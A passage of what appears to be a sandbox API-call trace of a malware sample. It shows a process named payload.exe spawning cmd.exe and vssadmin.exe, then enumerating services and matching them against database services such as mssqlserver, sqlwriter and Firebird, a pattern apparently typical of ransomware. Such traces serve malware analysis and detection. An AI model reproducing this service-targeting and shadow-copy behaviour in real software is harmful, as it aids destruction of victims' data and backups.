szExeFile="attended.exe")) returned 1 [0042.100] lstrlenW (lpString="attended.exe") returned 12 [0042.100] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0042.101] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0042.101] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0042.102] lstrlenW (lpString="pan physician.exe") returned 17 [0042.102] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0042.102] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0042.102] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0042.103] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0042.103] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0042.104] lstrlenW (lpString="over-celebrity.exe") returned 18 [0042.104] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0042.104] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0042.104] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0042.105] lstrlenW (lpString="payload.exe") returned 11 [0042.105] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0042.106] lstrlenW (lpString="cmd.exe") returned 7 [0042.106] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0042.106] lstrlenW (lpString="conhost.exe") returned 11 [0042.106] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0042.107] lstrlenW (lpString="vssadmin.exe") returned 12 [0042.107] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0042.108] lstrlenW (lpString="VSSVC.exe") returned 9 [0042.108] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.108] lstrlenW (lpString="svchost.exe") returned 11 [0042.108] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0042.109] CloseHandle (hObject=0x1b4) returned 1 [0042.109] Sleep (dwMilliseconds=0x1f4) [0042.894] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626e88 [0042.894] EnumServicesStatusExW (in: hSCManager=0x626e88, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0042.895] GetLastError () returned 0xea [0042.895] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0042.895] EnumServicesStatusExW (in: hSCManager=0x626e88, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0042.896] CloseServiceHandle (hSCObject=0x626e88) returned 1 [0042.896] lstrlenW (lpString="Appinfo") returned 7 [0042.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0042.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0042.896] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0042.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0042.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0042.897] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0042.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.897] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0042.897] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0042.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0042.897] lstrlenW (lpString="AudioSrv") returned 8 [0042.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0042.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0042.897] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0042.897] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0042.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0042.897] lstrlenW (lpString="BFE") returned 3 [0042.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0042.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0042.897] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0042.897] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0042.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0042.897] lstrlenW (lpString="CryptSvc") returned 8 [0042.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0042.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0042.897] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0042.897] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0042.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0042.897] lstrlenW (lpString="CscService") returned 10 [0042.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0042.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0042.897] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0042.897] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0042.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0042.897] lstrlenW (lpString="DcomLaunch") returned 10 [0042.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.898] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0042.898] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0042.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0042.898] lstrlenW (lpString="Dhcp") returned 4 [0042.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0042.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0042.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0042.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0042.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0042.898] lstrlenW (lpString="Dnscache") returned 8 [0042.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0042.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0042.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0042.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0042.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0042.898] lstrlenW (lpString="DPS") returned 3 [0042.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0042.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0042.898] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0042.898] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0042.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0042.898] lstrlenW (lpString="eventlog") returned 8 [0042.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0042.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0042.898] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0042.898] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0042.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0042.898] lstrlenW (lpString="EventSystem") returned 11 [0042.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0042.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0042.898] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0042.898] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0042.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0042.899] lstrlenW (lpString="gpsvc") returned 5 [0042.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0042.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0042.899] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0042.899] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0042.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0042.899] lstrlenW (lpString="iphlpsvc") returned 8 [0042.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.899] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0042.899] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0042.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0042.899] lstrlenW (lpString="LanmanServer") returned 12 [0042.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0042.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0042.899] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0042.899] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0042.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0042.899] lstrlenW (lpString="LanmanWorkstation") returned 17 [0042.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.899] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0042.899] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0042.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0042.899] lstrlenW (lpString="lmhosts") returned 7 [0042.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0042.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0042.899] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0042.899] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0042.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0042.900] lstrlenW (lpString="MMCSS") returned 5 [0042.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0042.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0042.900] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0042.900] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0042.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0042.900] lstrlenW (lpString="MpsSvc") returned 6 [0042.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0042.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0042.900] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0042.900] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0042.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0042.900] lstrlenW (lpString="Netman") returned 6 [0042.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0042.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0042.900] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0042.900] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0042.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0042.900] lstrlenW (lpString="netprofm") returned 8 [0042.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0042.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0042.900] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0042.900] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0042.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0042.900] lstrlenW (lpString="NlaSvc") returned 6 [0042.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0042.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0042.900] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0042.900] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0042.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0042.900] lstrlenW (lpString="nsi") returned 3 [0042.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0042.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0042.900] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0042.901] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0042.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0042.901] lstrlenW (lpString="PcaSvc") returned 6 [0042.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0042.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0042.901] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0042.901] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0042.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0042.901] lstrlenW (lpString="PlugPlay") returned 8 [0042.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0042.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0042.901] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0042.901] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0042.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0042.901] lstrlenW (lpString="Power") returned 5 [0042.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0042.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0042.901] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0042.901] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0042.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0042.901] lstrlenW (lpString="ProfSvc") returned 7 [0042.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0042.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0042.901] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0042.901] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0042.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0042.901] lstrlenW (lpString="RpcEptMapper") returned 12 [0042.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.901] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0042.901] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0042.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0042.901] lstrlenW (lpString="RpcSs") returned 5 [0042.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0042.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0042.902] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0042.902] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0042.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0042.902] lstrlenW (lpString="SamSs") returned 5 [0042.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0042.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0042.902] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0042.902] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0042.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0042.902] lstrlenW (lpString="Schedule") returned 8 [0042.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0042.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0042.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0042.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0042.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0042.902] lstrlenW (lpString="SENS") returned 4 [0042.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0042.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0042.902] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0042.902] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0042.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0042.902] lstrlenW (lpString="ShellHWDetection") returned 16 [0042.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.902] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0042.902] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0042.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0042.902] lstrlenW (lpString="Spooler") returned 7 [0042.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0042.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0042.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0042.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0042.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0042.903] lstrlenW (lpString="swprv") returned 5 [0042.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0042.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0042.903] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0042.903] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0042.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0042.903] lstrlenW (lpString="SysMain") returned 7 [0042.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0042.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0042.903] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0042.903] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0042.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0042.903] lstrlenW (lpString="Themes") returned 6 [0042.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0042.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0042.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0042.903] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0042.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0042.903] lstrlenW (lpString="TrkWks") returned 6 [0042.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0042.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0042.903] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0042.903] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0042.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0042.903] lstrlenW (lpString="UxSms") returned 5 [0042.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0042.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0042.903] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0042.903] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0042.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0042.903] lstrlenW (lpString="VSS") returned 3 [0042.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0042.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0042.903] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0042.903] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0042.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0042.904] lstrlenW (lpString="WdiServiceHost") returned 14 [0042.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.904] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0042.904] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0042.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0042.904] lstrlenW (lpString="WdiSystemHost") returned 13 [0042.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.904] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0042.904] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0042.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0042.904] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0042.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.904] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0042.904] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0042.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0042.904] lstrlenW (lpString="Winmgmt") returned 7 [0042.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0042.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 